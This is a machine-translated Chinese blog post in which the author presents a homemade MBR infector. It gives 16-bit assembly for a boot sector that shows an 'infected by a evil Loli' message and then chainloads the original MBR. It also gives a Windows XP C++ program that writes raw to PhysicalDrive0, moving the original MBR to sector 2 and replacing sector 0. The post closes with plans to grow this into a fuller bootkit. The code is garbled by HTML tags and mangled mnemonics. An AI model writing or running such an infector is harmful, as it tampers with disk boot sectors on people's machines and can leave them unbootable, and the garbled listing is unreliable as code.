On weekends, I blew the air-conditioner dry code, nice. (Voiceover: I'm waiting to buy my wife again.) t___t. The heap of the exam will be carried back, but there is no motivation to carry it back.
During the past two days, we have been engaged in MBR. The brothers in the group said that ghost shadows and tdl cattle are not engaged in MBR, but have penetrated the protection of some disk restoration software. penetration is the real highlight. I agree very much. said in the Group of Three, I reversed the virus, asm2c, and then re-compiled, anti-virus software reported virus. this is a mysterious realm, and the feeling of admiration arises naturally. alas, a burst of tears, a burst of tears ..
Dr. Lang xianpinlang once said: There are three kinds of people in the world. One is very smart and many things are made by him. The other is a kind of book. He can understand what the first person has done; the last one is the dumbest and has no idea. I hope that I can work hard for the first person to consolidate the identity of the second person.
Today, there are not many codes. I have made a fake MBR and a written EXE, but I still learned a lot about it. I have enough comments on the ASM code. Generally, I write code because it is self-entertaining and rarely comments.
The main job of this EXE is to copy the original MBR to the second sector, and then write the cottage MBR to the first sector. By the way, the partition activity table of the cottage MBR is fixed, the following code is attached:
/* <Br/>; file: mbrforfun. ASM <br/>; Author: GAA. RA <br/>; e-mail: zhoufan@yahoo.cn <br/>; date: 2011.6.18 <br/>; compile: NASM-F bin mbrforfun. ASM-O mbrforfun. IMG </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> CPU 486 <br/> bits 16; 16-bit real-time mode <br/> @ initial: <br/> xorbx, BX <br/> mov ds, BX <br/> mov ax, [0x413]; 0x413 indicates the BIOS memory record area <br/>. It records the memory size in KB. <br/>, distribute from high to low <br/> decax; (ax-2), allocate 2 kb space <br/> mov [0x413], ax; update the number of remaining space kb back <br/>. Here, we describe the number of remaining kb <br/>; it is related to the starting point of the obtained address <br/>; that is, ax * 1024 is the address we allocated <br/>; the starting address, see the distribution chart <br/> SHL ax, 0x6; here is the computing segment address, 16-bit real-time mode <br/>; addressing mode is (segment address: Offset) <br/>; calculated as (segment address x 0x10 + offset) <br/> mov es, ax; stored in ES registers <br/> mov Si, 0x7c00; start address of MBR <br/> XOR Di, di; clear di <br/> mov CX, 0x100; Length: 0x100 (512 bytes ), one slice length <br/> rep movsw; 0000 bytes of DS: Si (512: 7c00) length written to <br/>; es: di address, copy itself to the fixed memory </P> <p> push es; es segment into the stack <br/> push word @ main; @ main address (16 bits) <br/> retf; return far, return to ES: @ main, that is, return to us <br/>; copy its own address to @ main and execute <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ main: <br/> call @ displaymessage; displays some things. <br/> call @ getreturn; returns the input by the user. <br/> call @ bootos; jump to the operating system to start normally <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ displaymessage: <br/> movbp, titlemessage <br/> mov CX, 0x139; CX stores the length of titlemessage <br/> movax, 0x1301; Ah: 0x13 indicates the subfunction number 13 <br/>; Al: 0x1 indicates the display mode <br/> movbx, 0x000c; BH: 0x0 indicates the current page <br/>; Bl: 0xc indicates the character attribute (Red Letter) <br/> xordx, DX; DH indicates the row coordinate, DL indicates the column coordinate <br/> int10h; 0x10 indicates the interruption, display service <br/> RET <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ getreturn: <br/> movah, 0; Ah: 0x0 indicates the subfunction Of The 0th node. Read the keyboard. <br/> int16h; 0x16 interrupted. keyboard service <br/>; ah is the Keyboard Scan code, and Al is the ASCII Code <br/> andax, 0xff <br/> cmpal, 0xd; whether to press ENTER <br/> jnz @ getreturn; if not, continue reading <br/> RET <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ bootos: <br/> moves, DX; DX: 0x0, set es to 0 <br/> movax, 0x201; Ah: 0x2 indicates the number 2 sub-function <br/>; Al: 0x1 indicates that the number of read sectors is 1 <br/> movcx, 0x2; Ch: 0x0 indicates that the cylindrical surface is 0 <br/>. CL: 0 X1 indicates that the read sector is 2 <br/>. The 2nd sector stores the original MBR <br/> movdx, 0x80; DL: 0x80 indicates that the hard disk is read <br/> movbx, 0x7c00; es: Bx (0000: 7c00) indicates the buffer address <br/> int13h; 0x13 interrupted, direct Disk Service </P> <p> jmp0x0: 0x7c00; jump back to the original normal MBR for startup <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> infectedflagdb "Loli "; the infection mark of MBR, Ah Hahahaha <br/> titlemessagedb "+ --------------------------------------- +", 0xa, 0xd, <br/> DB "| mbrforfun. bin | ", 0xa, 0xd, <br/> DB" | gaa. RA | ", 0xa, 0xd, <br/> DB" | zhoufan@yahoo.cn | ", 0xa, 0xd, <br/> DB" + --------------------------------------- + ", 0xa, 0xd, <br/> DB "[-] Your computer is infected by a edevil Loli", 0xa, 0xd <br/> DB "[-] Now press enter, let's return to your OS "<br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> times 510-($-$) db 0; code data is followed by 0 to 510 bytes <br/> bootsignaturedw 0aa55h; MBR identifier, required <br/> times 1474560-512 db 0; I generate an imgfile of 1.44mb directly <br/>. It is convenient to use bochs for debugging. If you do not need it, <br/> comment it out by yourself <br/>; //////////////////////////////////////// //////////////////////////////////////// <br/> */
/* ++ <Br/> @ file mbrforfun. h <br/> @ auth gaa. RA <br/> @ date 2011.6.18 </P> <p> for Windows XP only <br/> -- */</P> <p> # ifndef _ mbrforfun_h <br/> # DEFINE _ mbrforfun_h </P> <p> # include <stdio. h> <br/> # include <windows. h> </P> <p> # define sector_size 512 <br/> # define driver_symlink l "////. // physicaldrive0 "</P> <p> unsigned char MBR [512] ={< br/> 0x31, 0xdb, 0x8e, 0xdb, 0xa1, 0x13, 0x04, 0x48, 0x48, 0xa3, 0x13, 0x04, 0xc1, 0xe0, 0x06, 0x8e, <br/> 0xc0, 0xbe, 0x00, 0x7c, 0x31, 0xff, 0xb9, 0x00, 0x01, 0xf3, 0xa5, 0x06, 0x68, 0x20, 0x00, 0xcb, <br/> 0xe8, 0x06, 0x00, 0xe8, 0x14, 0x00, 0xe8, 0x1d, 0x00, 0xbd, 0x5f, 0x00, 0xb9, 0x39, 0x01, 0xb8, <br/> 0x01, 0x13, 0xbb, 0x0c, 0x00, 0x31, 0xd2, 0xcd, 0x10, 0xc3, 0xb4, 0x00, 0xcd, 0x16, 0x25, 0xff, <br/> 0x00, 0x3c, 0x0d, 0x75, 0xf5, 0xc3, 0x8e, 0xc2, 0xb8, 0x01, 0x02, 0xb9, 0x02, 0x00, 0xba, 0x80, <br/> 0x00, 0xbb, 0x00, 0x7c, 0xcd, 0x13, 0xea, 0x00, 0x7c, 0x00, 0x00, 0x4c, 0x4f, 0x4c, 0x49, 0x2b, <br/> 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, <br/> 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, <br/> 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2b, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20, <br/> 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x4d, 0x62, 0x72, 0x46, 0x6f, <br/> 0x72, 0x46, 0x75, 0x6e, 0x2e, 0x42, 0x69, 0x6e, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, <br/> 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7c, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, <br/> 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x47, 0x61, 0x41, 0x2e, <br/> 0x52, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, <br/> 0x20, 0x20, 0x20, 0x7c, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, <br/> 0x20, 0x20, 0x20, 0x20, 0x7a, 0x68, 0x6f, 0x75, 0x66, 0x61, 0x6e, 0x40, 0x79, 0x61, 0x68, 0x6f, <br/> 0x6f, 0x2e, 0x63, 0x6e, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, <br/> 0x7c, 0x0a, 0x0d, 0x2b, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, <br/> 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, <br/> 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2b, 0x0a, 0x0d, <br/> 0x5b, 0x2d, 0x5d, 0x59, 0x6f, 0x75, 0x72, 0x20, 0x43, 0x6f, 0x6d, 0x70, 0x75, 0x74, 0x65, 0x72, <br/> 0x20, 0x69, 0x73, 0x20, 0x69, 0x6e, 0x66, 0x65, 0x63, 0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, <br/> 0x61, 0x20, 0x65, 0x76, 0x69, 0x6c, 0x20, 0x4c, 0x6f, 0x6c, 0x69, 0x0a, 0x0d, 0x5b, 0x2d, 0x5d, <br/> 0x4e, 0x6f, 0x77, 0x20, 0x50, 0x72, 0x65, 0x73, 0x73, 0x20, 0x45, 0x6e, 0x74, 0x65, 0x72, 0x2c, <br/> 0x20, 0x4c, 0x65, 0x74, 0x27, 0x73, 0x20, 0x72, 0x65, 0x74, 0x75, 0x72, 0x6e, 0x20, 0x74, 0x6f, <br/> 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x4f, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, <br/> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xaa <br/>}; </P> <p>/* handle <br/>; file: mbrforfun. ASM <br/>; //////////////////////////////////////// //////////////////////////////////////// <br/> CPU 486 <br/> bits 16 <br/> @ initial: <br/> xorbx, BX <br/> mov ds, BX <br/> mov ax, [0x413] <br/> decax <br/> mov [0x413], ax <br/> SHL ax, 0x6 <br/> mov es, ax <br/> mov Si, 0x7c00 <br/> XOR Di, di <br/> mov CX, 0x100 <br/> rep movsw </P> <p> push es <br/> push word @ main <br/> retf <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ main: <br/> call @ displaymessage <br/> call @ getreturn <br/> call @ bootos <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ displaymessage: <br/> movbp, titlemessage <br/> mov CX, 0x139 <br/> movax, 0x1301 <br/> movbx, 0x000c <br/> xordx, DX <br/> int10h <br/> RET <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ getreturn: <br/> movah, 0 <br/> int16h <br/> andax, 0xff <br/> cmpal, 0xd <br/> jnz @ getreturn <br/> RET <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> @ bootos: <br/> moves, DX <br/> movax, 0x201 <br/> movcx, 0x2 <br/> movdx, 0x80 <br/> movbx, 0x7c00 <br/> int13h </P> <p> jmp0x0: 0x7c00 <br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> infectedflagdb "Loli" <br/> titlemessagedb "+ ----------------------------------------- + ", 0xa, 0xd, <br/> DB "| mbrforfun. bin | ", 0xa, 0xd, <br/> DB" | gaa. RA | ", 0xa, 0xd, <br/> DB" | zhoufan@yahoo.cn | ", 0xa, 0xd, <br/> DB" + --------------------------------------- + ", 0xa, 0xd, <br/> DB "[-] Your computer is infected by a edevil Loli", 0xa, 0xd <br/> DB "[-] Now press enter, let's return to your OS "<br/>; //////////////////////////////////////// //////////////////////////////////////// </P> <p>; //////////////////////////////////////// //////////////////////////////////////// <br/> times 510-($-$) db 0 <br/> bootsignaturedw 0aa55h <br/>; //////////////////////////////////////// //////////////////////////////////////// <br/> ------------------------------------------------------------------- */</P> <p> void infectmbr (); </P> <p> # endif
/* ++ <Br/> @ file mbrforfun. CPP <br/> @ auth gaa. RA <br/> @ date 2011.6.18 </P> <p> for Windows XP only <br/> -- */</P> <p> # include "mbrforfun. H "</P> <p> int main (INT argc, char * argv []) <br/> {<br/> printf (" are u ready! /N "); <br/> system (" pause "); </P> <p> infectmbr (); </P> <p> return 0; <br/>}</P> <p> void infectmbr () <br/>{< br/> handlehdisk; <br/> byte * porimbr; <br/> dwordlength; </P> <p> hdisk = createfile (driver_symlink, <br/> generic_write | generic_read, <br/> file_cmd_read | file_cmd_write, <br/> null, <br/> open_existing, <br/> 0, <br/> null <br/> ); </P> <p> If (invalid_handle_value = hdisk) <br/> {<br/> printf ("Open Disk Error/N "); <br/> return; <br/>}</P> <p> porimbr = (byte *) virtualalloc (null, sector_size, mem_commit, page_readwrite | page_nocache); <br/> If (null = porimbr) <br/>{< br/> printf ("virtualalloc () error! /N "); <br/> return; <br/>}</P> <p> setfilepointer (hdisk, 0, null, file_begin ); <br/> If (! Readfile (hdisk, porimbr, sector_size, & length, null) <br/>{< br/> printf ("readfile () error! /N "); <br/> return; <br/>}</P> <p> // write the original MBR to the second sector <br/> setfilepointer (hdisk, sector_size, null, file_begin ); <br/> If (! Writefile (hdisk, porimbr, sector_size, & length, null) <br/>{< br/> printf ("writefile () error! /N "); <br/> return; <br/>}</P> <p> // fixed the partition table in our MBR. <br/> memcpy (& MBR [0x1be], porimbr + 0x1be, 4*16); <br/> setfilepointer (hdisk, 0, null, file_begin); <br/> If (! Writefile (hdisk, MBR, sector_size, & length, null) <br/>{< br/> printf ("writefile () MBR error! /N "); <br/> return; <br/>}</P> <p> virtualfree (porimbr, sector_size, mem_release ); <br/> closehandle (hdisk); <br/> return; <br/>}
ASM is used to compile MBR,. h and. cpp are compiled into EXE, and MBR is extracted from unsigned char MBR in. H [512].
Effect after infection:
After you press enter, you can normally enter the operating system.
Think about it:
1. when the disk front-end is idle, I can see from winhex that the idle sector of my VM is approximately 28kb, that is, there are 56 sectors. This part of space can be used up, because the maximum length of the Code in MBR is 0x1be, as I have very few code here, most of them are titlemessage, make good use of these 56 sectors to complete more powerful functions (the code shows how to read the content of a sector and load it into the memory ), in stoned bootkit, the author uses the first 63 sectors.
2. for memory that can be used, the data obtained by bochs debugging from [0x413] is approximately 0x27fkb, which is sufficient and is fixed memory after being copied, after entering the operating system, you can find this part of data (marked as Loli, Ah Hahahaha). Now there are two key issues, how do I convert or enter the address space in the 32-bit protection mode under the 16-bit assembly of the real mode? The other is how to switch between a virtual address and a real physical address in the operating system protection mode? We also need to continue our research and seek advice from experts and thank you.
Finally, I love the silver soul !!! Miss sb's day with brothers !!!
Some useful information is attached:
[1]. bochs debugging command
Http://bochs.sourceforge.net/cgi-bin/topper.pl? Name = new + bochs + documentation & url = http://bochs.sourceforge.net/doc/docbook/user/index.html
[2]. bios and DOS interruptions
Http://linux.chinaunix.net/techdoc/install/2008/08/26/1028043.shtml